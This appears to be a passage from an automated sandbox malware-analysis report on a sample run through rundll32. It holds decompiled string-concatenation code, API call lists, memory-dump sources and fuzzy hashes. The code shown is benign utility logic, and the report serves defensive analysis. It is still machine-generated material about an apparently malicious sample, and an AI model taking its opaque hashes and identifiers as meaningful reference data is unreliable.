                                • Opcode Fuzzy Hash: c60aa9715ecf730e22e8fe83ec59d980197e9c033cf62d7e7176c4c14112557f
                                • Instruction Fuzzy Hash: BB21F032722216ABDB027F79D844AAE7FB8AF16284B448059F805DB280DB34E900C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0428272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E04281525(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04D7935C,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 0428273D
                                • lstrlenW.KERNEL32(04285398,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 04282744
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 04282764
                                • memcpy.NTDLL(74E069A0,04285398,00000002,00000000,004F0053,74E069A0,?,?,04285398,004F0053,04D7935C), ref: 04282777
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 646d63f260f149e44949d89b42dfbb9cb856f1d00c1b838371fd1722998f97d0
                                • Instruction ID: b4008b879369725d7e368c23b0ecbce6d9077f6b20bda919ba4457c05d3a508f
                                • Opcode Fuzzy Hash: 646d63f260f149e44949d89b42dfbb9cb856f1d00c1b838371fd1722998f97d0
                                • Instruction Fuzzy Hash: 7CF03732A11119BBCB11AFA9CC84C9E7BADEF082987018066A90497241EA75EA108BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                • lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: bbbc518d69ed9459dd40a5087594fbe0dc9b81b2d9f68069844c4b93e1ea3a33
                                • Instruction ID: 6538ddc293500b4d0f5936d18226c9a959b421e46c0a0c0c351432bcfd773b21
                                • Opcode Fuzzy Hash: bbbc518d69ed9459dd40a5087594fbe0dc9b81b2d9f68069844c4b93e1ea3a33
                                • Instruction Fuzzy Hash: D1E06D33603221678611AAA9BC4CC9FBAACEE89691304041AF600D3100CB299C068BA1
                                Uniqueness

                                Uniqueness Score: -1.00%